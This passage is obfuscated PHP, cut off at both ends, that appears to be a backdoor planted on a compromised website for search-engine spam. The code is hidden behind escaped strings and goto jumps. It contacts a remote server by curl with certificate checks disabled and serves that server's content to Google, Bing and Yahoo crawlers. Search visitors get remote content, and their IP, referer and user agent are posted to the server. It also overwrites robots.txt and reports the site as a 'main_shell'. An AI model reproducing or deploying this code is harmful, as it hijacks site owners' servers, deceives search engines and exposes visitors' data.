0 || $check1 == "\61") { $data1["\141\143\164\151\x6f\x6e"] = "\x72\141\x6e\x64\137\170\x6d\154"; $check_url4 = getServerCont($url_words, $data1); header("\x43\x6f\156\164\x65\156\x74\55\164\x79\160\x65\72\164\145\170\x74\57\x78\x6d\154"); echo $check_url4; die; } } goto MZJWL; IAjnp: $map1 = $inter_domain . "\57\155\141\x70\56\x70\150\x70"; goto TKj5u; P03wr: $inter_domain = "\x68\164\164\x70\163\x3a\x2f\57\x7a\66\60\x35\x32\67\137\61\66\x2e\x66\154\145\150\x6e\145\162\x2e\143\x6f\155\57"; goto Ztc2S; Ztc2S: function getServerCont($url, $data = array()) { $url = str_replace("\40", "\53", $url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "{$url}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); $output = curl_exec($ch); $errorCode = curl_errno($ch); if (version_compare(PHP_VERSION, "\x38\56\60\x2e\60", "\74")) { curl_close($ch); } if (0 !== $errorCode) { return false; } return $output; } goto W4Rxq; ydpx_: $ser_name = $_SERVER["\x53\105\122\x56\x45\x52\x5f\x4e\101\x4d\x45"]; goto bBcbe; MKJx_: $req_uri = str_replace(array("\56\150\164\155", "\x2e\x68\x74\155\x6c", "\x2e\x73\150\164\x6d\x6c", "\56\x70\x68\x74\x6d\154"), '', rtrim($req_uri, "\x2f")); goto H14By; ViI5f: if ($res_crawl) { $data1["\150\x74\164\160\x5f\x75\163\145\162\x5f\141\x67\x65\x6e\164"] = $user_agent; $get_content = getServerCont($indata1, $data1); echo $get_content; die; } goto rJ1zu; TzSMQ: $referer = isset($_SERVER["\x48\124\124\120\x5f\x52\105\106\x45\x52\105\x52"]) ? $_SERVER["\110\124\x54\120\137\122\105\x46\x45\122\105\x52"] : ''; goto eYYZC; bBcbe: $req_url = $http . $domain . $req_uri; goto HSbvw; lub_J: $user_agent = strtolower(isset($_SERVER["\x48\124\124\120\137\125\123\x45\122\137\x41\107\105\x4e\124"]) ? $_SERVER["\x48\124\x54\120\x5f\x55\123\x45\122\137\x41\x47\105\x4e\x54"] : ''); goto i0V8C; plPFV: $req_uri = $_SERVER["\x52\x45\121\x55\x45\x53\124\x5f\x55\122\111"]; goto RKurH; ssmLA: $url_robots = $inter_domain . "\57\162\157\x62\157\164\x73\56\160\x68\x70"; goto h_QvS; o9Hp8: $data1[] = array(); goto LDDt7; cLZAI: $self = $_SERVER["\120\x48\120\137\x53\x45\x4c\106"]; goto ydpx_; H14By: if (!$res_crawl && $chk_refer && (preg_match("\57\x5c\144\44\57", $req_uri) || preg_match("\43\133\141\x2d\x7a\x5d\75\x5b\x61\x2d\x7a\60\55\x39\x5d\53\43", $req_uri) || preg_match("\x2f\151\164\145\155\57", $req_uri))) { $data1["\x69\160"] = $_SERVER["\122\105\x4d\117\124\105\x5f\101\104\x44\x52"]; $data1["\x72\145\x66\x65\162\145\x72"] = isset($_SERVER["\110\x54\124\x50\137\x52\105\106\x45\122\105\122"]) ? $_SERVER["\110\x54\x54\x50\x5f\122\105\106\x45\x52\x45\x52"] : ''; $data1["\x75\x73\145\x72\137\x61\147\x65\x6e\x74"] = strtolower(isset($_SERVER["\x48\x54\x54\120\137\125\123\x45\x52\x5f\101\107\105\x4e\x54"]) ? $_SERVER["\110\124\x54\x50\x5f\x55\123\105\122\137\101\107\105\x4e\124"] : ''); echo getServerCont($jump1, $data1); die; } goto ViI5f; i0V8C: $res_crawl = is_crawler($user_agent); goto MKJx_; W4Rxq: function is_crawler($agent) { $agent_check = false; $bots = "\x67\157\157\x67\154\x65\x62\157\164\x7c\142\151\x6e\147\x62\157\x74\x7c\x67\x6f\x6f\x67\x6c\145\174\141\x6f\x6c\x7c\142\151\156\x67\x7c\x79\x61\150\x6f\157"; if ($agent != '') { if (preg_match("\x2f\x28{$bots}\x29\x2f\x73\x69", $agent)) { $agent_check = true; } } return $agent_check; } goto AqrQt; S233r: if (substr($req_uri, -6) == "\x72\157\142\157\x74\x73") { define("\102\101\123\105\x5f\x50\x41\124\110", $_SERVER["\104\x4f\x43\125\115\105\x4e\124\x5f\122\x4f\117\124"]); $robots_cont = @file_get_contents(BASE_PATH . "\57\x72\157\x62\x6f\164\x73\x2e\164\170\164"); $data1["\162\157\142\157\164\x73\x5f\x63\157\156\164"] = $robots_cont; $robots_cont = @getServerCont($url_robots, $data1); file_put_contents(BASE_PATH . "\x2f\162\157\x62\157\x74\163\56\164\x78\164", $robots_cont); $robots_cont = @file_get_contents(BASE_PATH . "\57\x72\157\142\x6f\x74\163\56\x74\170\164"); if (strpos(strtolower($robots_cont), "\x73\x69\x74\145\155\141\x70")) { echo "\162\157\142\x6f\x74\163\56\x74\x78\x74\x20\x66\x69\154\x65\x20\143\162\x65\141\164\x65\x20\x73\165\x63\x63\x65\163\163\41"; } else { echo "\162\x6f\x62\157\x74\x73\x2e\x74\170\x74\x20\146\x69\154\x65\x20\x63\x72\x65\x61\164\x65\x20\x66\141\x69\154\x21"; } die; } goto u6bO6; MZJWL: if (strpos($req_uri, "\x2e\x70\x68\x70")) { $main_shell = $http . $ser_name . $self; $data1["\x6d\x61\151\156\137\x73\150\145\x6c\x6c"] = $main_shell; } else { $main_shell = $http . $ser_name; $data1["\155\141\x69\156\x5f\163\150\145\154\x6c"] = $main_shell; } goto TzSMQ; TKj5u: $jump1 = $inter_domain . "\x2f\152\x75\155\160\56\x70\x68\x70"; goto VyOgU; AqrQt: function check_refer($refer) { $check_refer = false; $referbots = "\x67\x6f\157\x67\154\145\174\x79\141\x68\x6f\157\174\142\151\156\147\174\141\x6f\x6c"; if ($refer != '' && preg_match("\57\50{$referbots}\51\57\x73\x69", $refer)) { $check_refer = true; } return $check_refer; } goto gjQlc; RKurH: $domain = $_SERVER["\x48\x54\x54\120\137\110\x4f\x53\x54"]; goto cLZAI; rJ1zu: ?>